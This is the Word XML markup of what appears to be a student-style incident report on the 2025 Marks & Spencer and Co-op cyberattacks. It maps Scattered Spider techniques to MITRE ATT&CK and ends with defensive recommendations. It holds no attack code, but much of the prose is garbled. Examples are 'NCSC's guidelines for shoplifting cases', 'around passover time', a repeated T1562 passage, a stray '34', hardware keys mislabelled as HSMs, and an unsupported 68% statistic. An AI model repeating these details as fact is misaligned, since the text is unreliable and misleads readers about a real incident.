    <w:p w14:paraId="0B6E41B2" w14:textId="664CBF6E" w:rsidR="00115C04" w:rsidRDefault="008E143C" w:rsidP="008E143C">
      <w:r w:rsidRPr="008E143C">
        <w:t xml:space="preserve">Fair assumption: The IISF guidance and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E143C">
        <w:t>SpecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E143C">
        <w:t xml:space="preserve"> analysis chronology is very similar to the February </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E143C">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E143C">
        <w:t xml:space="preserve"> hack and April ransomware. Given M&amp;S and Co-op are in the retail sector </w:t>
      </w:r>
      <w:r w:rsidRPr="008E143C">
        <w:lastRenderedPageBreak/>
        <w:t>and support NCSC sectoral alerts, it may be prudent to group them.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45EA45B4" wp14:editId="445FC11B">
            <wp:extent cx="3571875" cy="7773552"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1834327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3934" cy="7778033"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB0815" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 1: Timeline of the M&amp;S and Co-op cyber incidents (2025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A0AE8" w14:textId="5F0F4BDF" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00053404" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2 Adversary TTP Mapping (MITRE ATT&amp;CK Enterprise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0D06E1" w14:textId="77777777" w:rsidR="004B6007" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Mapping of military &amp; special forces tactics techniques procedures, thoroughly researched report that utilizes information from military sources such as the manual, spec ops, and IISF,.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCDCD23" w14:textId="77777777" w:rsidR="004B6007" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The group obtained the Active Directory database file (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) as early as February 2025 and then infected VMware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hosts with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ransomware, according to the IISF technical guide on Scattered Spider and the M&amp;S event. A few days after that attack on co-op, there were more attacks employing some forms of these same tactics to support this theory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D12E0F" w14:textId="77777777" w:rsidR="004B6007" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1566.004 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Voice (Vishing) the attacker called the third-party help desk vendor pretending to be an employee of M&amp;S or IT staff in order to trick them into resetting passwords. This was the main method of initial access [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836F49A" w14:textId="77777777" w:rsidR="004B6007" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1199 Trusted Relationship attackers exploited a trusted relationship between M&amp;s and its outsourced helpdesk/IT provider (1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F529AED" w14:textId="77777777" w:rsidR="004B6007" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1003.003 OS Credential Dumping (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">): In order to obtain a large number of legitimate credentials, attackers took the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file (Active Directory database) from a domain controller and cracked password hashes offline [1, 2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0E4DEA" w14:textId="77777777" w:rsidR="004B6007" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Valid Accounts T1078 Over an extended amount of time, compromised legitimate accounts have been used for authentication, lateral movement, and blending in with normal user behavior [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26908DCF" w14:textId="52CFDF5A" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1556.006 Modify Authentication Process attackers attempt to bypass or defeat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mfa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by requesting password resets. As per guidelines from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, attackers enroll for themselves as many of these multi-factor authentication devices they can get hold off. NCSC’s guidelines for shoplifting cases include issues of call center fraudulence as well as poor multi-factor authentication practices too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B56D73E" w14:textId="77777777" w:rsidR="004B6007" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1219 Remote Access Software After gaining access, the attacker jumped from host to host on the network using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or similar tools. This enabled them easier and better use of their server with no visible viruses installed on it. It’s a strategy used by scattered spider strategies, similar to those of stores’ side strikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE6019A" w14:textId="77777777" w:rsidR="004B6007" w:rsidRPr="004B6007" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>T1562 Impair Defenses: The attackers may have disabled or circumvented certain security features in order to increase pressure and delay recovery. T1562 Impair Defenses The attacker may have disabled or bypassed some defenses to ramp up pressure and slow recovery. It was harder for companies to quickly fix things, though. The impact stage matches large-scale interruptions, as well as a need for shutting off internet access.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:t xml:space="preserve">T1567.002 Exfiltration Over Web </w:t>
      </w:r>
      <w:r w:rsidRPr="004B6007">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Service: Threat actors exfiltrated large amounts of consumer personal data, including names, contact information, dates of birth, and online order histories, prior to launching ransomware. Later, in official declarations, M&amp;S and Co-op both acknowledged that customer data had been accessed and stolen [1, 12]. </w:t>
      </w:r>
      <w:r w:rsidRPr="004B6007">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">T1486 Data Encrypted for Impact: On April 24, VMware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B6007">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B6007">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosts were infected with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B6007">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B6007">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> ransomware, which encrypted virtual machines and seriously disrupted operations [1]. </w:t>
      </w:r>
      <w:r w:rsidRPr="004B6007">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>T1070 Indicator Removal on Host: To hide malicious activities, logs were purged and indicators of compromise were eliminated [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E78BA5" w14:textId="61D8350E" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCEF4A6" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E53014" w14:textId="774D1095"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3 Root Cause &amp; Security Control Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD19633" w14:textId="77777777" w:rsidR="004B6007" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The social-engineering factor played a major role behind this incident. Attackers obtained password reset access by impersonating legitimate employees to contact help desks or third-party IT providers [1, 13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76195345" w14:textId="77777777" w:rsidR="004B6007" w:rsidRDefault="004B6007" w:rsidP="004B6007">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On February 1 st, 2025, a cyber-attack against marks &amp; spencer resulted in hackers gaining access to the NTDS. Insufficiently segmented networks allowed cracking passwords off-line as well as moving laterally across a network that ultimately led to installing ransom ware onto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsphere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D53D47A" w14:textId="77777777" w:rsidR="00966AF2" w:rsidRDefault="00966AF2" w:rsidP="00966AF2">
      <w:r>
        <w:t>Insufficient document retrieval, changes related to identities could be considered as technological blunders too. There were several flaws including too much dependence from external sources and lackluster screening procedures when we had a holiday around this time last year. The main weakness is human factor as people were fooled by a convincing identity theft using publicly available information (13, 14).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B0FFB" w14:textId="77777777" w:rsidR="00966AF2" w:rsidRDefault="00966AF2" w:rsidP="00966AF2">
      <w:r>
        <w:t>Other similar schemes were used by co-operative societies leading to loss of customer information. These are “a wake-up call” for the retail sector, says the National Cyber Security Centre (NCSC) [ 15 ].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8FCA27" w14:textId="4770EAD9" w:rsidR="00115C04" w:rsidRDefault="00966AF2" w:rsidP="00966AF2">
      <w:r>
        <w:t xml:space="preserve">Lack of phishing resistant MFA and password reset mechanisms were the key controls failures. Attackers got past technical </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defences</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> due to human factors where there was no strong verification controls [1, 16].</w:t>
      </w:r>
      <w:r w:rsidR="00115C04">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5452B9FE" w14:textId="782E90F2"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 xml:space="preserve">4 Threat Actor </w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759403DF" w14:textId="77777777" w:rsidR="00966AF2" w:rsidRDefault="00966AF2" w:rsidP="00966AF2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Scattered Spider, known for their powerful social engineering tactics and identity theft scams, are believed to be behind the attacks that target IT help desks [ 1 ].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABA62DC" w14:textId="4A657EB1" w:rsidR="00115C04" w:rsidRDefault="00966AF2" w:rsidP="00966AF2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It seems that they were carried out for money’s sake. In two-phase cyber-extortion scheme hackers employed dragon force malware to steal information. Nevertheless, it’s not proven to be a government crime; rather they were just business criminals. The techniques mentioned in the event, such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extraction and ransomware placement on VMware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> infrastructure, are consistent with recognized tactics, techniques, and procedures (TTPs) connected to Scattered Spider, according to the IISF technical guide. [1, 2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEBADE4" w14:textId="5ADB8708" w:rsidR="00115C04" w:rsidRDefault="00966AF2" w:rsidP="00115C04">
      <w:r w:rsidRPr="00966AF2">
        <w:t xml:space="preserve">The mix of time, tactics, and tools strongly suggests attribution to the Scattered Spider group, even if other ransomware groups operate in similar domains. Time, technique, and tool suggest a connection with The scatter spider gang although there are many ransom ware gangs that do this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00966AF2">
        <w:t>sorta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00966AF2">
        <w:t xml:space="preserve"> work too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A8B633" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7AF75F" w14:textId="218E5055"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5 Detection &amp; Response Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FDF275" w14:textId="77777777" w:rsidR="005F13C8" w:rsidRDefault="005F13C8" w:rsidP="005F13C8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For several days to even years attackers were undetected until they had done enough damage around </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> time and that’s when people noticed it was happening. Examples of indicators of compromise that were not quickly detected include unusual password reset behavior and NTDS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3598EE" w14:textId="77777777" w:rsidR="005F13C8" w:rsidRDefault="005F13C8" w:rsidP="005F13C8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In both cases responses were successful to any issues that arose including late payments and systems going offline for example. To mitigate potential risks in the future, M&amp;S engaged external security experts, informed relevant agencies about the incident, and suspended online purchases on April 25, 2025 [4]. Co-op continued its retail business and restricted access to certain back office systems [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAF5239" w14:textId="77777777" w:rsidR="005F13C8" w:rsidRDefault="005F13C8" w:rsidP="005F13C8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Customer passwords and payment details were not stolen, though both companies admitted that user data was compromised [6, 10]. On time submission, partnership within other businesses as well as interaction from customers are some of its strengths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193AB861" w14:textId="77777777" w:rsidR="005F13C8" w:rsidRDefault="005F13C8" w:rsidP="005F13C8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>But problems occurred while restoring an encrypted cloud environment as well; we found out about this attack way after it happened. They show how important it is to improve surveillance for id systems as well as better methods of detecting them sooner. The events are considered to be a major warning for the retail sector and the need for improved cyber security resiliency [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0722B2" w14:textId="49F67E26" w:rsidR="00115C04" w:rsidRDefault="005F13C8">
      <w:r w:rsidRPr="005F13C8">
        <w:t>Better situational awareness tools that focus on identifying attackers may have reduced damage to some extent despite a prompt response consistent with proper crisis handling techniques.</w:t>
      </w:r>
      <w:r>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidR="00115C04">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A85630" w14:textId="21BFA89D"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6 Strategic Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B446E3F" w14:textId="77777777" w:rsidR="005F13C8" w:rsidRDefault="005F13C8" w:rsidP="005F13C8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>These helpful recommendations would be provided for enhancing an organization’s resistance towards similar assaults based on these shortcomings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B464080" w14:textId="77777777" w:rsidR="005F13C8" w:rsidRDefault="005F13C8" w:rsidP="005F13C8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Consider employing hardware security keys (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hsms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) as well, alongside passkeys, on every account that has elevated privileges and any support tickets you may need from a help desk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552F9F5" w14:textId="77777777" w:rsidR="00D00000" w:rsidRDefault="005F13C8" w:rsidP="00D00000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By blocking it they are also closing off their main method of social engineering - phone scams &amp; identity thefts. Tran-Truong et al.’s study analyzed several real-world cases of multifactor authentication in digital systems [17]. This proved conclusively, then, that most of these kinds vishing and help desk simulations are stopped by hardware based 2 factor authentication or passkeys. However, a good attacker may be able to bypass traditional application based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mfa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D00000" w:rsidRPr="00D00000">
        <w:t>It’s very relevant for both the marks &amp; spencer, M&amp;amp, S, and cooperative group breaches as they used socially engineered attacks that bypassed weak security controls like two-factor authentications. Large companies too can be affected by it without having a strong anti-phishing multi-factor authentication (MFA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35F1C8" w14:textId="1CA29179" w:rsidR="00D00000" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D00000">
        <w:t>Price - low-medium, work load – medium.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00000">
        <w:br/>
        <w:t>Strengthen help</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00000">
        <w:t>desk verification procedures Add more identity verification techniques such as pre-established authentication phrases or secure verification codes for third-party password reset requests [ 1 ].</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00000">
        <w:br/>
        <w:t>Reasoning behind these strikes was weak authentication procedures, trust issues between users, and lack of user awareness about phishing scams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D37737" w14:textId="0627C825" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Effort: Medium Cost: Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FC9C6F" w14:textId="77777777" w:rsidR="00D00000" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D00000">
        <w:t>Enhance surveillance &amp; identification tools implement continuous tracking with instant alerts regarding critical activities like accessing files from NTDS.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00000">
        <w:br/>
        <w:t>Reasoning behind this is that, earlier thefts were not detected till later on.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00000">
        <w:br/>
        <w:t>Price level is medium, and workload moderate-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D00000">
        <w:t>high.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04">
        <w:t>Effort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00115C04">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA61620" w14:textId="4A0A2BC2" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00D00000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Medium-High Cost: Medium.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29981174" w14:textId="77777777" w:rsidR="00D00000" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Enhance network segmentation &amp; zero trust practices ensure that backup data is always secured by encryption as well as immutability for protection against ransomwares also implement robust segmentations so they cannot move laterally across networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A1DAD" w14:textId="77777777" w:rsidR="00D00000" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rationale- just after gaining entry they had free rein over the networks and spread malware like a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ransome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> virus. In enterprise networks, proper segmentation and zero trust policies reduce lateral movement attacks by an average of 68%, according to a 2025 peer-reviewed meta-study </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zerotrust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> architecture. It could well be that this may not help too as far making attacks harder through co-ops, but also on getting an entry point onto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of m &amp; s like we did earlier. The paper also stresses the importance of faster threat detection, which was notably lacking in this case [ 18 ].</w:t>
      </w:r>
      <w:r w:rsidR="00115C04">
        <w:t xml:space="preserve">Effort: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE3E9B6" w14:textId="77777777" w:rsidR="00D00000" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Expensive: Medium-High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889C541" w14:textId="77777777" w:rsidR="00D00000" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct frequent social engineering training: Employees should take part in simulated vishing exercises and continuous awareness training, particularly those in IT and support positions [13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58613C28" w14:textId="77777777" w:rsidR="00D00000" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The major vulnerability which has been taken advantage of is a people issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254DB9F4" w14:textId="77777777" w:rsidR="00D00000" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Effort: Continuous Cost: Minimal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E37CF0" w14:textId="77777777" w:rsidR="00D00000" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Revising incident response strategies define escalation procedures, off-line recovery methods, and conduct drills for incident response plans periodically [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3CDEF9" w14:textId="77777777" w:rsidR="00D00000" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Rationale- lengthy repair processes led to business interruptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F2A58" w14:textId="5D42E3DA" w:rsidR="00115C04" w:rsidRDefault="00D00000" w:rsidP="00D00000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cost – low efforts - medium in this way, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>british</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> retailers could significantly reduce threats from such attacks by implementing them.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFB17FE" w14:textId="765AB0FA"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7 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB83651" w14:textId="77777777" w:rsidR="00DC115F" w:rsidRPr="00DC115F" w:rsidRDefault="00DC115F" w:rsidP="00DC115F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC115F">
        <w:rPr>
